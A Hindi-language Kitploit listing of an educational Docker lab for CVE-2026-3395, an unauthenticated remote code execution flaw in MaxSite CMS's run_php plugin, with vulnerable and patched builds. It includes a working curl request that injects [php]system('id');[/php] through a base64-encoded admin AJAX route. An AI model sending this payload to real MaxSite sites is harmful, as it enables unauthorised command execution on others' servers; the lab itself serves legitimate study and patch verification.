Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3395-Lab — शैक्षिक Docker लैब जो CVE-2026-3395 का प्रदर्शन करती है, जो MaxSite CMS में run_php प्लगइन के माध्यम से एक बिना प्रमाणीकरण वाला RCE है, जिसमें सुरक्षित पुनरुत्पादन और विश्लेषण के लिए कमजोर और पैच किए गए वातावरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

शैक्षिक Docker लैब जो CVE-2026-3395 का प्रदर्शन करती है, जो MaxSite CMS में run_php प्लगइन के माध्यम से एक बिना प्रमाणीकरण वाला RCE है, जिसमें सुरक्षित पुनरुत्पादन और विश्लेषण के लिए कमजोर और पैच किए गए वातावरण शामिल हैं।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-3395 — MaxSite CMS बिना प्रमाणीकरण RCE लैब

यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए है। सभी परीक्षण स्थानीय Docker लैब वातावरण में किए जाने चाहिए। इस सेटअप को सार्वजनिक या उत्पादन प्रणालियों पर तैनात न करें।


सारांश

CVE-2026-3395 MaxSite CMS को प्रभावित करता है और एक प्रशासनिक AJAX एंडपॉइंट तक बिना प्रमाणीकरण पहुंच की अनुमति देता है। जब run_php प्लगइन सक्षम होता है, तो उपयोगकर्ता इनपुट को CMS हुक प्रणाली के माध्यम से PHP कोड के रूप में मूल्यांकित किया जा सकता है, जो रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।

इस रिपॉजिटरी में शामिल हैं:

  • एक असुरक्षित बिल्ड (पैच-पूर्व कमिट)
  • एक पैच किया गया बिल्ड (पैच-पश्चात कमिट)
  • पुनरुत्पादन के लिए एक Docker लैब
  • एक सुरक्षित प्रभाव-प्रमाण प्रदर्शन

भेद्यता अवलोकन

असुरक्षित एंडपॉइंट यहाँ स्थित है:

root@kitploit:~
application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

असुरक्षित संस्करण में:

  • एंडपॉइंट तक बिना प्रमाणीकरण पहुंचा जा सकता है
  • उपयोगकर्ता इनपुट (POST data) को mso_hook() के माध्यम से पारित किया जाता है
  • run_php प्लगइन [php]...[/php] ब्लॉकों को संसाधित करता है
  • प्लगइन संलग्न कोड का मूल्यांकन eval() का उपयोग करके करता है
  • यदि run_php सक्षम है, तो इसका परिणाम बिना प्रमाणीकरण रिमोट कोड निष्पादन होता है।

    पैच किया गया संस्करण निम्न जोड़ता है:

    root@kitploit:~
    if (!is_login()) die('no login');
    mso_checkreferer();
    

    यह पहुंच को केवल प्रमाणित उपयोगकर्ताओं तक सीमित करता है।


    Docker लैब सेटअप

    यह लैब दो वातावरण बनाता है:

    वातावरणपोर्ट
    असुरक्षित8081
    पैच किया गया8082

    आवश्यकताएँ

    • Docker
    • Docker Compose v2

    1. बिल्ड और प्रारंभ

    root@kitploit:~
    docker compose up -d --build
    

    यह निम्न करेगा:

    • दोनों इमेज बनाएगा
    • डेटाबेस प्रारंभ करेगा
    • CMS इंस्टॉलर स्वचालित रूप से चलाएगा
    • लैब कॉन्फ़िगरेशन में run_php सक्षम करेगा

    2. इंस्टॉलेशन सत्यापित करें

    अपने ब्राउज़र में खोलें:

    root@kitploit:~
    http://localhost:8081  (असुरक्षित)
    http://localhost:8082  (पैच किया गया)
    

    दोनों इंस्टेंस सफलतापूर्वक लोड होने चाहिए।

    Lab Running


    भेद्यता का प्रमाण (केवल लैब)

    AJAX रूट base64-एन्कोडेड पथ का उपयोग करता है।

    का Base64:

    root@kitploit:~
    admin/plugins/editor_markitup/preview-ajax.php
    

    है:

    root@kitploit:~
    YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==
    

    असुरक्षित इंस्टेंस परीक्षण

    root@kitploit:~
    curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
      -H "X-Requested-With: XMLHttpRequest" \
      -H "Referer: http://localhost:8081/" \
      --data-urlencode "data=[php]system('id');[/php]"
    

    Vulnerable RCE Output


    पैच किए गए इंस्टेंस परीक्षण

    root@kitploit:~
    curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
      -H "X-Requested-With: XMLHttpRequest" \
      -H "Referer: http://localhost:8082/" \
      --data-urlencode "data=[php]system('id');[/php]"
    

    अपेक्षित परिणाम:

    root@kitploit:~
    no login
    

    Patched Access Control


    लैब रोकें

    कंटेनर रोकने के लिए:

    root@kitploit:~
    docker compose down -v
    

    अस्वीकरण

    इस प्रोजेक्ट का उपयोग केवल पृथक वातावरण में शोध और सीखने के उद्देश्यों के लिए करें।


    संदर्भ

    • सार्वजनिक लेख: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
    • VulDB प्रविष्टि: https://vuldb.com/?submit.762169
    • आधिकारिक पैच कमिट: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
    टूल डाउनलोड करें